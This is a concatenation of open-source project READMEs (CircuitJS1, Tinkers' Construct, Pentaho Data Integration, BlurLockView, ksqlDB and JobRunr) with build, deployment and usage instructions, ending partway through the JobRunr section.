Electronic Circuit Simulator in the Browser
# CircuitJS1 ## Introduction CircuitJS1 is an electronic circuit simulator that runs in the browser. It was originally written by Paul Falstad as a Java Applet. It was adapted by Iain Sharp to run in the browser using GWT. For a hosted version of the application see: * Paul's Page: [http://www.falstad.com/circuit/](http://www.falstad.com/circuit/) * Iain's Page: [http://lushprojects.com/circuitjs/](http://lushprojects.com/circuitjs/) Thanks to: Edward Calver for 15 new components and other improvements; Rodrigo Hausen for file import/export and many other UI improvements; J. Mike Rollins for the Zener diode code; Julius Schmidt for the spark gap code and some examples; Dustin Soodak for help with the user interface improvements; Jacob Calvert for the T Flip Flop; Ben Hayden for scope spectrum; Thomas Reitinger, Krystian Sławiński, Usevalad Khatkevich, Lucio Sciamanna, Mauro Hemerly Gazzani, J. Miguel Silva, and Franck Viard for translations; Andre Adrian for improved emitter coupled oscillator; Felthry for many examples; Colin Howell for code improvements. LZString (c) 2013 pieroxy. ## Building the web application The tools you will need to build the project are: * Eclipse, Oxygen version. * GWT plugin for Eclipse. Install "Eclipse for Java developers" from [here](https://www.eclipse.org/downloads/packages/). To add the GWT plugin for Eclipse follow the instructions [here](https://gwt-plugins.github.io/documentation/gwt-eclipse-plugin/Download.html). This repository is a project folder for your Eclipse project space. Once you have a local copy you can then build and run in development mode or build for deployment. Running in super development mode is done by clicking on the "run" icon on the toolbar and choosing from the "Development Mode" tab which appears. Building for deployment is done by selecting the project root node and using the GWT button on the Eclipse taskbar and choosing "GWT Compile Project...". GWT will build its output in to the "war" directory. In the "war" directory the file "iframe.html" is loaded as an iFrame in to the spare space at the bottom of the right hand pannel. It can be used for branding etc. ## Deployment of the web application * "GWT Compile Project..." as explained above. This will put the outputs in to the "war" directory in the Eclipse project folder. You then need to copy everything in the "war" directory, except the "WEB-INF" directory, on to your web server. * Customize the header of the file "circuitjs1.html" to include your tracking, favicon etc. * Customize the "iframe.html" file to include any branding you want in the right hand panel of the application * The optional file "shortrelay.php" is a server-side script to act as a relay to a URL shortening service to avoid cross-origin problems with a purely client solution. You may want to customize this for your site. If you don't want to use this feature edit the circuitjs1.java file before compiling. * If you wish to enable dropbox loading and saving a dropbox API app-key is needed. This should be edited in to the circuitjs.html file where needed. If this is not included the relevant features will be disabled. The link for the full-page version of the application is now: `http://<your host>/<your path>/circuitjs1.html` (you can rename the "circuitjs1.html" file if you want too though you should also update "shortrelay.php" if you do). Just for reference the files should look like this ``` -+ Directory containing the front page (eg "circuitjs") +- circuitjs.html - full page version of application +- iframe.html - see notes above +- shortrelay.php - see notes above ++ circuitjs1 (directory) +- various files built by GWT +- circuits (directory, containing example circuits) +- setuplist.txt (index in to example circuit directory) ``` ## Embedding You can link to the full page version of the application using the link shown above. If you want to embed the application in another page then use an iframe with the src being the full-page version. You can add query parameters to link to change the applications startup behaviour. The following are supported: ``` .../circuitjs.html?cct=<string> // Load the circuit from the URL (like the # in the Java version) .../circuitjs.html?ctz=<string> // Load the circuit from compressed data in the URL .../circuitjs.html?startCircuit=<filename> // Loads the circuit named "filename" from the "Circuits" directory .../circuitjs.html?startCircuitLink=<URL> // Loads the circuit from the specified URL. CURRENTLY THE URL MUST BE A DROPBOX SHARED FILE OR ANOTHER URL THAT SUPPORTS CORS ACCESS FROM THE CLIENT .../circuitjs.html?euroResistors=true // Set to true to force "Euro" style resistors. If not specified the resistor style will be based on the user's browser's language preferences .../circuitjs.html?usResistors=true // Set to true to force "US" style resistors. If not specified the resistor style will be based on the user's browser's language preferences .../circuitjs.html?whiteBackground=<true|false> .../circuitjs.html?conventionalCurrent=<true|false> .../circuitjs.html?running=<true|false> // Start the app without the simulation running, default true .../circuitjs.html?hideSidebar=<true|false> // Hide the sidebar, default false .../circuitjs.html?hideMenu=<true|false> // Hide the menu, default false .../circuitjs.html?editable=<true|false> // Allow circuit editing, default true .../circuitjs.html?positiveColor=%2300ff00 // change positive voltage color (rrggbb) .../circuitjs.html?negativeColor=%23ff0000 // change negative voltage color .../circuitjs.html?hideInfoBox=<true|false> ``` ## Building an Electron application The [Electron](https://electronjs.org/) project allows web applications to be distributed as local executables for a variety of platforms. This repository contains the additional files needed to build circuitJS1 as an Electron application. The general approach to building an Electron application for a particular platform is documented [here](https://electronjs.org/docs/tutorial/application-distribution). The following instructions apply this approach to circuit JS. To build the Electron application: * Compile the application using GWT, as above. * Download and unpack a [pre-built Electron binary directory](https://github.com/electron/electron/releases) version 9.3.2 for the target platform. * Copy the "app" directory from this repository to the location specified [here](https://electronjs.org/docs/tutorial/application-distribution) in the Electron binary directory structure. * Copy the "war" directory, containing the compiled CircuitJS1 application, in to the "app" directory the Electron binary directory structure. * Run the "Electron" executable file. It should automatically load CircuitJS1. Known limitations of the Electron application: * "Create short URL" on "Export as URL" doesn't work as it relies on server support. * For diodes, "Create Simple Model" doesn't work as it relies on a javascript feature that is not supported. Thanks to @Immortalin for the initial work in applying Electron to CircuitJS1. ## License This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
Tinker a little, build a little, tinker a little more...
# [Tinkers' Construct](http://minecraft.curseforge.com/projects/tinkers-construct) Modify all the things, then do it again! Melt down any metals you find. Power the world with spinning wind! ### IMC Tinkers' Construct supports several IMCs to allow mods to integrate themselves. The [Wiki](https://github.com/SlimeKnights/TinkersConstruct/wiki/IMC) contains a page with further information. Anything that is not possible via IMC has to be integrated via Code through the API/library package. (old 1.7.10 IMCs can be found here: https://gist.github.com/bonii-xx/e46f9d9e81e29d796b1b) ## Setting up a Workspace/Compiling from Source Note: Git MUST be installed and in the system path to use our scripts. * Setup: Run [gradle]in the repository root: `gradlew[.bat] [setupDevWorkspace|setupDecompWorkspace] [eclipse|idea]` * Build: Run [gradle]in the repository root: `gradlew[.bat] build` * If obscure Gradle issues are found try running `gradlew clean` and `gradlew cleanCache` ## Issue reporting Please include the following: * Minecraft version * Tinkers' Construct version * Forge version/build * Versions of any mods potentially related to the issue * Any relevant screenshots are greatly appreciated. * For crashes: * Steps to reproduce * ForgeModLoader-client-0.log (the FML log) from the root folder of the client ## Licenses Code, Textures and binaries are licensed under the [MIT License](https://tldrlegal.com/license/mit-license). You are allowed to use the mod in your modpack. Any modpack which uses Tinkers' Construct takes **full** responsibility for user support queries. For anyone else, we only support official builds from the main CI server, not custom built jars. We also do not take bug reports for outdated builds of Minecraft. If you have queries about any license or the above support restrictions, please drop by our IRC channel, #TinkersConstruct on irc.esper.net Any alternate licenses are noted where appropriate. ## Jar Signing Some jars from our build servers may be signed. Under no circumstances does anyone have permission to verify the signatures on those jars from other mods. The signing is for informational purposes only.
Pentaho Data Integration ( ETL ) a.k.a Kettle
# Pentaho Data Integration # Pentaho Data Integration ( ETL ) a.k.a Kettle ### Project Structure * **assemblies:** Project distribution archive is produced under this module * **core:** Core implementation * **dbdialog:** Database dialog * **ui:** User interface * **engine:** PDI engine * **engine-ext:** PDI engine extensions * **[plugins:](plugins/README.md)** PDI core plugins * **integration:** Integration tests How to build -------------- Pentaho Data Integration uses the Maven framework. #### Pre-requisites for building the project: * Maven, version 3+ * Java JDK 11 * This [settings.xml](https://raw.githubusercontent.com/pentaho/maven-parent-poms/master/maven-support-files/settings.xml) in your <user-home>/.m2 directory #### Building it This is a Maven project, and to build it use the following command: ``` $ mvn clean install ``` Optionally you can specify -Drelease to trigger obfuscation and/or uglification (as needed) Optionally you can specify -Dmaven.test.skip=true to skip the tests (even though you shouldn't as you know) The build result will be a Pentaho package located in ```target```. #### Packaging / Distributing it Packages can be built by using the following command: ``` $ mvn clean package ``` The packaged results will be in the `target/` sub-folders of `assemblies/*`. For example, a distribution of the Desktop Client (CE) can then be found in: `assemblies/client/target/pdi-ce-*-SNAPSHOT.zip`. #### Running the tests __Unit tests__ This will run all unit tests in the project (and sub-modules). To run integration tests as well, see Integration Tests below. ``` $ mvn test ``` If you want to remote debug a single Java unit test (default port is 5005): ``` $ cd core $ mvn test -Dtest=<<YourTest>> -Dmaven.surefire.debug ``` __Integration tests__ In addition to the unit tests, there are integration tests that test cross-module operation. This will run the integration tests. ``` $ mvn verify -DrunITs ``` To run a single integration test: ``` $ mvn verify -DrunITs -Dit.test=<<YourIT>> ``` To run a single integration test in debug mode (for remote debugging in an IDE) on the default port of 5005: ``` $ mvn verify -DrunITs -Dit.test=<<YourIT>> -Dmaven.failsafe.debug ``` To skip test ``` $ mvn clean install -DskipTests ``` To get log as text file ``` $ mvn clean install test >log.txt ``` __IntelliJ__ * Don't use IntelliJ's built-in maven. Make it use the same one you use from the commandline. * Project Preferences -> Build, Execution, Deployment -> Build Tools -> Maven ==> Maven home directory ### Contributing 1. Submit a pull request, referencing the relevant [Jira case](https://jira.pentaho.com/secure/Dashboard.jspa) 2. Attach a Git patch file to the relevant [Jira case](https://jira.pentaho.com/secure/Dashboard.jspa) Use of the Pentaho checkstyle format (via `mvn checkstyle:check` and reviewing the report) and developing working Unit Tests helps to ensure that pull requests for bugs and improvements are processed quickly. When writing unit tests, you have at your disposal a couple of ClassRules that can be used to maintain a healthy test environment. Use [RestorePDIEnvironment](core/src/test/java/org/pentaho/di/junit/rules/RestorePDIEnvironment.java) and [RestorePDIEngineEnvironment](engine/src/test/java/org/pentaho/di/junit/rules/RestorePDIEngineEnvironment.java) for core and engine tests respectively. pex.: ```java public class MyTest { @ClassRule public static RestorePDIEnvironment env = new RestorePDIEnvironment(); #setUp()... @Test public void testSomething() { assertTrue( myMethod() ); } } ``` ### Asking for help Please go to https://community.hitachivantara.com/community/products-and-solutions/pentaho/ to ask questions and get help.
Lock view with blur effect. Easy to customise.
# BlurLockView [![WoWoViewPager](https://github.com/Nightonke/WoWoViewPager/blob/master/app/src/main/res/mipmap-hdpi/ic_launcher.png?raw=true)](https://github.com/Nightonke/WoWoViewPager) [![BoomMenu](https://github.com/Nightonke/BoomMenu/blob/master/app/src/main/res/mipmap-hdpi/ic_launcher.png?raw=true)](https://github.com/Nightonke/BoomMenu) [![CoCoin](https://github.com/Nightonke/CoCoin/blob/master/app/src/main/res/mipmap-hdpi/ic_launcher.png?raw=true)](https://github.com/Nightonke/CoCoin) [![BlurLockView](https://github.com/Nightonke/BlurLockView/blob/master/app/src/main/res/mipmap-hdpi/ic_launcher.png?raw=true)](https://github.com/Nightonke/BlurLockView) [![LeeCo](https://github.com/Nightonke/LeeCo/blob/master/app/src/main/res/mipmap-hdpi/ic_launcher.png?raw=true)](https://github.com/Nightonke/LeeCo) [![GithubWidget](https://github.com/Nightonke/GithubWidget/blob/master/app/src/main/res/mipmap-hdpi/ic_launcher.png?raw=true)](https://github.com/Nightonke/GithubWidget) [![JellyToggleButton](https://github.com/Nightonke/JellyToggleButton/blob/master/app/src/main/res/mipmap-hdpi/ic_launcher.png?raw=true)](https://github.com/Nightonke/JellyToggleButton) [![FaceOffToggleButton](https://github.com/Nightonke/FaceOffToggleButton/blob/master/app/src/main/res/mipmap-hdpi/ic_launcher.png?raw=true)](https://github.com/Nightonke/FaceOffToggleButton) ![BlurLockView](https://github.com/Nightonke/BlurLockView/blob/master/Pictures/in_out.gif) Lock view with blur effect. Easy to customise. # [中文文档](https://github.com/Nightonke/BlurLockView/blob/master/README-ZH.md) # Note 1. The blur effect comes from [500px-android-blur](https://github.com/500px/500px-android-blur). 2. More animations for showing or hiding the BlurLockView will be added. 3. In the demo, I use [Material-Dialogs](https://github.com/afollestad/material-dialogs) for convenient. # Usage [Demo](https://github.com/Nightonke/BlurLockView#demo) [Gradle](https://github.com/Nightonke/BlurLockView#gradle) [Easy to Use](https://github.com/Nightonke/BlurLockView#easy-to-use) [Show and Hide](https://github.com/Nightonke/BlurLockView#show-and-hide) [Listeners](https://github.com/Nightonke/BlurLockView#listeners) [Blur Effect](https://github.com/Nightonke/BlurLockView#blur-effect) [Keyboard](https://github.com/Nightonke/BlurLockView#keyboard) [Text](https://github.com/Nightonke/BlurLockView#text) [Font](https://github.com/Nightonke/BlurLockView#font) [Style](https://github.com/Nightonke/BlurLockView#style) [Incorrect Password](https://github.com/Nightonke/BlurLockView#incorrect-password) ### Demo Try demo here: [Download from Fir](http://fir.im/yakc) [Download from Github](https://github.com/Nightonke/BlurLockView/blob/master/Apk/BlurLock-V1.0.0.apk?raw=true) ![Fir](https://github.com/Nightonke/BlurLockView/blob/master/Pictures/fir.png) You can get all about BlurLockView from the demo. ![Settings](https://github.com/Nightonke/BlurLockView/blob/master/Pictures/test.png) ![Operations](https://github.com/Nightonke/BlurLockView/blob/master/Pictures/operations.png) ### Gradle Add this to build.gradle: ```java dependencies { ... compile 'com.nightonke:blurlockview:1.0.0' ... } ``` ### Easy to Use Add the xml code: ```xml <com.nightonke.blurlockview.BlurLockView android:id="@+id/blurlockview" android:layout_width="match_parent" android:layout_height="match_parent" /> ``` Notice that you should set the BlurLockView to cover the view than need to be blured. Add this to initialize the BlurLockView: ```java // Set the view that need to be blurred blurLockView.setBlurredView(imageView1); // Set the password blurLockView.setCorrectPassword(getIntent().getStringExtra("PASSWORD")); ``` ### Show and Hide You can choose duration, direction and ease type to show or hide the BlurLockView. For instance, the gif at the start of readme shows as ```ShowType.FADE_IN``` with 1000ms and ```HideType.FADE_OUT``` with 1000ms. You can check all the directions and ease types in the demo above. ![Ease](https://github.com/Nightonke/BlurLockView/blob/master/Pictures/ease.gif) ### Listeners BlurLockView.OnPasswordInputListener ```java @Override public void correct(String inputPassword) { // the input password is correct // you can hide the BlurLockView, for example } @Override public void incorrect(String inputPassword) { // the input password is incorrect } @Override public void input(String inputPassword) { // the password is being input } ``` BlurLockView.OnLeftButtonClickListener ```java @Override public void onClick() { // The left button is being clicked } ``` Implements the listeners above and then: ```java blurLockView.setOnLeftButtonClickListener(this); blurLockView.setOnPasswordInputListener(this); ``` Notice that the right button is set as "Backspace" usually, so there is not OnRightButtonClickListener. ### Blur Effect You can set the effect of blur with 3 parameters. 1. **DownsampleFactor**, with ```setDownsampleFactor(int downsampleFactor)```, the smaller, the clearer. 2. **BlurRadius**, with ```setBlurRadius(int blurRadius)```, the smaller, the clearer. 3. **OverlayColor**, with ```setOverlayColor(int color)```, to change the overlay color of BlurLockView. Examples: ![clear](https://github.com/Nightonke/BlurLockView/blob/master/Pictures/clear.png) ![unclear](https://github.com/Nightonke/BlurLockView/blob/master/Pictures/unclear.png) ![red](https://github.com/Nightonke/BlurLockView/blob/master/Pictures/red.png) ![blue](https://github.com/Nightonke/BlurLockView/blob/master/Pictures/blue.png) ### Keyboard You can use different keyboard to get different password. ```java setType(Password type, boolean smoothly); ``` Choose ```Password.NUMBER```(default) or ```Password.TEXT``` and whether change password type smoothly. Notice that the password with text is case-insensitive(I will improve this). ![Password Type](https://github.com/Nightonke/BlurLockView/blob/master/Pictures/keyboard.gif) ### Text 1. Set the text of title with ```setTitle(String string)```. 2. Set the text of left button with ```setLeftButton(String string)```. 3. Set the text of right button with ```setRightButton(String string)```. ### Font You can set all the font of text with ```setTypeface(Typeface typeface)```. ### Style **1.** Set the background of buttons in Password.TEXT with ```setSmallButtonViewsBackground(int id)```. The default resource drawable is: ```xml <?xml version="1.0" encoding="utf-8"?> <selector xmlns:android="http://schemas.android.com/apk/res/android" > <item android:state_pressed="true" > <shape android:shape="oval" > </shape> </item> <item android:state_focused="true"> <shape android:shape="oval" > <stroke android:width="1dip" android:color="@color/default_button_press" /> <solid android:color="@android:color/transparent"/> </shape> </item> <item > <shape android:shape="oval" > <stroke android:width="1dip" android:color="@color/default_button_press" /> <solid android:color="@android:color/transparent"/> </shape> </item> </selector> ``` **2.** Set the click effect of buttons in Password.TEXT with ```setBigButtonViewsClickEffect(int id)```. The default resource drawable is: ```xml <?xml version="1.0" encoding="utf-8"?> <selector xmlns:android="http://schemas.android.com/apk/res/android" > <item > <shape android:shape="oval" > <solid android:color="@color/default_button_press"/> </shape> </item> </selector> ``` **3.** When you click the buttoms in Password.TEXT, the effect above will disappear and you can set the duration by ```setSmallButtonViewsClickEffectDuration(int duration)```. **4.** Similarly, you can set the 3 styles of buttons in Password.NUMBER like above with ```setBigButtonViewsBackground(int id)```, ```setBigButtonViewsClickEffect(int id)``` and ```setBigButtonViewsClickEffectDuration(int duration)```. **5.** Try to set the color of all the text with ```setTextColor(int color)```. **6.** You can get the widgets in BlurLockView by: 1. ```public TextView getTitle() {return title;}``` to get the title. 2. ```public TextView getLeftButton() {return leftButton;}``` to get the left button. 3. ```public TextView getRightButton() {return rightButton;}``` to get the right button. 4. ```public BigButtonView[] getBigButtonViews() {return bigButtonViews;}``` to get the 10 number buttons in array. 5. ```public SmallButtonView[][] getSmallButtonViews() {return smallButtonViews;}``` to get all the text buttons in array. Notice that some buttons in the array is null. you can find all the real buttons by this: ```java private final char CHARS[][] = { {'1', '2', '3', '4', '5', '6', '7', '8', '9', '0'}, {'Q', 'W', 'E', 'R', 'T', 'Y', 'U', 'I', 'O', 'P'}, { 'A', 'S', 'D', 'F', 'G', 'H', 'J', 'K', 'L' }, { 'Z', 'X', 'C', 'V', 'B', 'N', 'M' } }; ``` ### Incorrect Password BlurLockView counts for incorrect input times. You can use ```getIncorrectInputTimes()``` to get the times and use ```setIncorrectInputTimes(int incorrectInputTimes)``` to reset the times. # Versions ### 1.0.0 # Todo 1. More animations. 2. Change the Password.TEXT to case-sensitive with other signals. # License Copyright 2016 Nightonke Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
The database purpose-built for stream processing applications.
event-streaming-database interactive kafka kafka-connect ksqldb ksqldb-documentation ksqldb-tutorials materialized-views real-time sql stream-processing streaming-queries
# ![KSQL rocket](ksql-rocket.png) ksqlDB ### The database purpose-built for stream processing applications # Overview ksqlDB is a database for building stream processing applications on top of Apache Kafka. It is **distributed**, **scalable**, **reliable**, and **real-time**. ksqlDB combines the power of real-time stream processing with the approachable feel of a relational database through a familiar, lightweight SQL syntax. ksqlDB offers these core primitives: * **[Streams](https://docs.ksqldb.io/en/latest/concepts/collections/streams/) and [tables](https://docs.ksqldb.io/en/latest/concepts/collections/tables/)** - Create relations with schemas over your Apache Kafka topic data * **[Materialized views](https://docs.ksqldb.io/en/latest/concepts/materialized-views/)** - Define real-time, incrementally updated materialized views over streams using SQL * **[Push queries](https://docs.ksqldb.io/en/latest/concepts/queries/push/)**- Continuous queries that push incremental results to clients in real time * **[Pull queries](https://docs.ksqldb.io/en/latest/concepts/queries/pull/)** - Query materialized views on demand, much like with a traditional database * **[Connect](https://docs.ksqldb.io/en/latest/concepts/connectors)** - Integrate with any [Kafka Connect](https://docs.confluent.io/current/connect/index.html) data source or sink, entirely from within ksqlDB Composing these powerful primitives enables you to build a complete streaming app with just SQL statements, minimizing complexity and operational overhead. ksqlDB supports a wide range of operations including aggregations, joins, windowing, sessionization, and much more. You can find more ksqlDB tutorials and resources [here](https://developer.confluent.io/tutorials/use-cases.html). # Getting Started * Follow the [ksqlDB quickstart](https://ksqldb.io/quickstart.html) to get started in just a few minutes. * Read through the [ksqlDB documentation](https://docs.ksqldb.io). * Take a look at some [ksqlDB use case recipes](https://developer.confluent.io/tutorials/use-cases.html) for examples of common patterns. # Documentation See the [ksqlDB documentation](https://docs.ksqldb.io/) for the latest stable release. # Use Cases and Examples ## Materialized views ksqlDB allows you to define materialized views over your streams and tables. Materialized views are defined by what is known as a "persistent query". These queries are known as persistent because they maintain their incrementally updated results using a table. ```sql CREATE TABLE hourly_metrics AS SELECT url, COUNT(*) FROM page_views WINDOW TUMBLING (SIZE 1 HOUR) GROUP BY url EMIT CHANGES; ``` Results may be **"pulled"** from materialized views on demand via `SELECT` queries. The following query will return a single row: ```sql SELECT * FROM hourly_metrics WHERE url = 'http://myurl.com' AND WINDOWSTART = '2019-11-20T19:00'; ``` Results may also be continuously **"pushed"** to clients via streaming `SELECT` queries. The following streaming query will push to the client all incremental changes made to the materialized view: ```sql SELECT * FROM hourly_metrics EMIT CHANGES; ``` Streaming queries will run perpetually until they are explicitly terminated. ## Streaming ETL Apache Kafka is a popular choice for powering data pipelines. ksqlDB makes it simple to transform data within the pipeline, readying messages to cleanly land in another system. ```sql CREATE STREAM vip_actions AS SELECT userid, page, action FROM clickstream c LEFT JOIN users u ON c.userid = u.user_id WHERE u.level = 'Platinum' EMIT CHANGES; ``` ## Anomaly Detection ksqlDB is a good fit for identifying patterns or anomalies on real-time data. By processing the stream as data arrives you can identify and properly surface out of the ordinary events with millisecond latency. ```sql CREATE TABLE possible_fraud AS SELECT card_number, count(*) FROM authorization_attempts WINDOW TUMBLING (SIZE 5 SECONDS) GROUP BY card_number HAVING count(*) > 3 EMIT CHANGES; ``` ## Monitoring Kafka's ability to provide scalable ordered records with stream processing make it a common solution for log data monitoring and alerting. ksqlDB lends a familiar syntax for tracking, understanding, and managing alerts. ```sql CREATE TABLE error_counts AS SELECT error_code, count(*) FROM monitoring_stream WINDOW TUMBLING (SIZE 1 MINUTE) WHERE type = 'ERROR' GROUP BY error_code EMIT CHANGES; ``` ## Integration with External Data Sources and Sinks ksqlDB includes native integration with [Kafka Connect](https://docs.ksqldb.io/en/latest/concepts/connectors) data sources and sinks, effectively providing a unified SQL interface over a [broad variety of external systems](https://www.confluent.io/hub). The following query is a simple persistent streaming query that will produce all of its output into a topic named `clicks_transformed`: ```sql CREATE STREAM clicks_transformed AS SELECT userid, page, action FROM clickstream c LEFT JOIN users u ON c.userid = u.user_id EMIT CHANGES; ``` Rather than simply send all continuous query output into a Kafka topic, it is often very useful to route the output into another datastore. ksqlDB's Kafka Connect integration makes this pattern very easy. The following statement will create a Kafka Connect sink connector that continuously sends all output from the above streaming ETL query directly into Elasticsearch: ```sql CREATE SINK CONNECTOR es_sink WITH ( 'connector.class' = 'io.confluent.connect.elasticsearch.ElasticsearchSinkConnector', 'key.converter' = 'org.apache.kafka.connect.storage.StringConverter', 'topics' = 'clicks_transformed', 'key.ignore' = 'true', 'schema.ignore' = 'true', 'type.name' = '', 'connection.url' = 'http://elasticsearch:9200'); ``` <a name="community"></a> # Join the Community For user help, questions or queries about ksqlDB please use our [user Google Group](https://groups.google.com/forum/#!forum/ksql-users) or our public Slack channel #ksqldb in [Confluent Community Slack](https://slackpass.io/confluentcommunity). Everyone is welcome! You can get help, learn how to contribute to ksqlDB, and find the latest news by [connecting with the Confluent community](https://www.confluent.io/contact-us-thank-you/). For more general questions about the Confluent Platform please post in the [Confluent Google group](https://groups.google.com/forum/#!forum/confluent-platform). # Contributing and building from source Contributions to the code, examples, documentation, etc. are very much appreciated. - Report issues and bugs directly in [this GitHub project](https://github.com/confluentinc/ksql/issues). - Learn how to work with the ksqlDB source code, including building and testing ksqlDB as well as contributing code changes to ksqlDB by reading our [Development and Contribution guidelines](CONTRIBUTING.md). - One good way to get started is by tackling a [newbie issue](https://github.com/confluentinc/ksql/labels/good%20first%20issue). # License The project is licensed under the [Confluent Community License](LICENSE). *Apache, Apache Kafka, Kafka, and associated open source project names are trademarks of the [Apache Software Foundation](https://www.apache.org/).*
An extremely easy way to perform background processing in Java. Backed by persistent storage. Open and free for commercial use.
background-jobs java java-8 java-scheduler parallel-processing quartz scheduled-jobs scheduler scheduling
<p align="center"> <a href="https://www.jobrunr.io/en/" target="_blank"><img src="https://user-images.githubusercontent.com/567842/80095933-1181c900-8569-11ea-85e7-14129b3f8142.png" alt="JobRunr logo"></img></a> </p> <p align="center"> The ultimate library to perform background processing on the JVM.<br/> Dead simple API. Extensible. Reliable. <br/> Distributed and backed by persistent storage. <br/> Open and free for commercial use. </p> <br/> <p align="center"> <a href="https://search.maven.org/artifact/org.jobrunr/jobrunr"><img src="https://maven-badges.herokuapp.com/maven-central/org.jobrunr/jobrunr/badge.svg"></a>&nbsp; <img alt="Drone Build" src="https://build.jobrunr.io/api/badges/jobrunr/jobrunr/status.svg" />&nbsp; <img alt="LGPLv3 Licence" src="https://img.shields.io/badge/license-LGPLv3-green.svg" /><br/> <a href="https://sonarcloud.io/dashboard?id=jobrunr_jobrunr"><img alt="Quality Scale" src="https://sonarcloud.io/api/project_badges/measure?project=jobrunr_jobrunr&metric=sqale_rating" /></a>&nbsp; <a href="https://sonarcloud.io/dashboard?id=jobrunr_jobrunr"><img alt="Vulnerabilities" src="https://sonarcloud.io/api/project_badges/measure?project=jobrunr_jobrunr&metric=vulnerabilities" /></a>&nbsp; <a href="https://sonarcloud.io/dashboard?id=jobrunr_jobrunr"><img alt="Security Rating" src="https://sonarcloud.io/api/project_badges/measure?project=jobrunr_jobrunr&metric=security_rating" /></a><br/> <!--a href="https://sonarcloud.io/dashboard?id=jobrunr_jobrunr"><img alt="Coverage" src="https://sonarcloud.io/api/project_badges/measure?project=jobrunr_jobrunr&metric=coverage" /></a>&nbsp; <a href="https://sonarcloud.io/dashboard?id=jobrunr_jobrunr"><img alt="Reliability Rating" src="https://sonarcloud.io/api/project_badges/measure?project=jobrunr_jobrunr&metric=reliability_rating" /></a>&nbsp; <a href="https://sonarcloud.io/dashboard?id=jobrunr_jobrunr"><img alt="Bugs" src="https://sonarcloud.io/api/project_badges/measure?project=jobrunr_jobrunr&metric=bugs" /></a--><br/> <a href="https://twitter.com/intent/tweet?text=Try%20JobRunr%20for%20easy%20distributed%20background%20job%20processing%20on%20the%20JVM%21%20&url=https://www.jobrunr.io&via=jobrunr&hashtags=java,scheduling,processing,distributed,developers"><img alt="Tweet about us!" src="https://www.jobrunr.io/tweet-btn.svg?v2" /></a>&nbsp; <a href="https://github.com/jobrunr/jobrunr/stargazers"><img alt="Star us!" src="https://www.jobrunr.io/github-star-btn.svg?v2" /></a> <a href="https://github.com/jobrunr/jobrunr/discussions"><img src="https://img.shields.io/badge/chat-Github%20discussions-green" alt="Join the chat at Gitter" /></a><br /> </p> ## Overview ```java BackgroundJob.enqueue(() -> System.out.println("This is all you need for distributed jobs!")); ``` Incredibly easy way to perform **fire-and-forget**, **delayed**, **scheduled** and **recurring jobs** inside **Java applications** using only *Java 8 lambda's*. CPU and I/O intensive, long-running and short-running jobs are supported. Persistent storage is done via either RDBMS (e.g. Postgres, MariaDB/MySQL, Oracle, SQL Server, DB2 and SQLite) or NoSQL (ElasticSearch, MongoDB and Redis). JobRunr provides a unified programming model to handle background tasks in a **reliable way** and runs them on shared hosting, dedicated hosting or in the cloud ([hello Kubernetes](https://www.jobrunr.io/en/blog/2020-05-06-jobrunr-kubrnetes-terraform/)) within a JVM instance. ## Feedback > Thanks for building JobRunr, I like it a lot! Before that I used similar libraries in Ruby and Golang and JobRunr so far is the most pleasant one to use. I especially like the dashboard, it’s awesome! [Alex Denisov](https://www.linkedin.com/in/alex-denisov-a29bab2a/) View more feedback on [jobrunr.io](https://www.jobrunr.io/en/#why-jobrunr). ## Features - Simple: just use Java 8 lambda's to create a background job. - Distributed & cluster-friendly: guarantees execution by single scheduler instance using optimistic locking. - Persistent jobs: using either a RDMBS (four tables and a view) or a noSQL data store. - Embeddable: built to be embedded in existing applications. - Minimal dependencies: ([ASM](https://asm.ow2.io/), slf4j and either [jackson](https://github.com/FasterXML/jackson) and jackson-datatype-jsr310, [gson](https://github.com/google/gson) or a JSON-B compliant library). ## Usage scenarios Some scenarios where it may be a good fit: - within a REST api return response to client immediately and perform long-running job in the background - mass notifications/newsletters - calculations of wages and the creation of the resulting documents - batch import from xml, csv or json - creation of archives - firing off web hooks - image/video processing - purging temporary files - recurring automated reports - database maintenance - updating elasticsearch/solr after data changes - *…and so on* You can start small and process jobs within your web app or scale horizontally and add as many background job servers as you want to handle a peak of jobs. JobRunr will distribute the load over all the servers for you. JobRunr is also fault-tolerant - is an external web service down? No worries, the job is automatically retried 10-times with a smart back-off policy. JobRunr is a Java alternative to [HangFire](https://github.com/HangfireIO/Hangfire), [Resque](https://github.com/resque/resque), [Sidekiq](http://sidekiq.org), [delayed_job](https://github.com/collectiveidea/delayed_job), [Celery](https://github.com/celery/celery) and is similar to [Quartz](https://github.com/quartz-scheduler/quartz) and [Spring Task Scheduler](https://github.com/spring-guides/gs-scheduling-tasks). Screenshots ----------- <img src="https://user-images.githubusercontent.com/567842/80217070-60019700-863f-11ea-9f02-d62c77e97a1c.png" width="45%" style="margin-right: 20px;"></img>&nbsp;&nbsp;&nbsp;<img src="https://user-images.githubusercontent.com/567842/80217075-609a2d80-863f-11ea-8994-cd0ca16b31c4.png" width="45%"></img> <br/> <img src="https://user-images.githubusercontent.com/567842/80217067-5f690080-863f-11ea-9d41-3e2878ae7ac8.png" width="45%" style="margin-right: 20px;"></img>&nbsp;&nbsp;&nbsp;<img src="https://user-images.githubusercontent.com/567842/80217063-5ed06a00-863f-11ea-847b-3ed829fd5503.png" width="45%"></img><br /><img src="https://user-images.githubusercontent.com/567842/80217079-6132c400-863f-11ea-9789-8633897ef317.png" width="45%" style="margin-right: 20px;"></img>&nbsp;&nbsp;&nbsp;<img src="https://user-images.githubusercontent.com/567842/80217078-609a2d80-863f-11ea-9b49-c891985de924.png" width="45%"></img> Usage ------ [**Fire-and-forget tasks**](https://www.jobrunr.io/en/documentation/background-methods/enqueueing-jobs/) Dedicated worker pool threads execute queued background jobs as soon as possible, shortening your request's processing time. ```java BackgroundJob.enqueue(() -> System.out.println("Simple!")); ``` [**Delayed 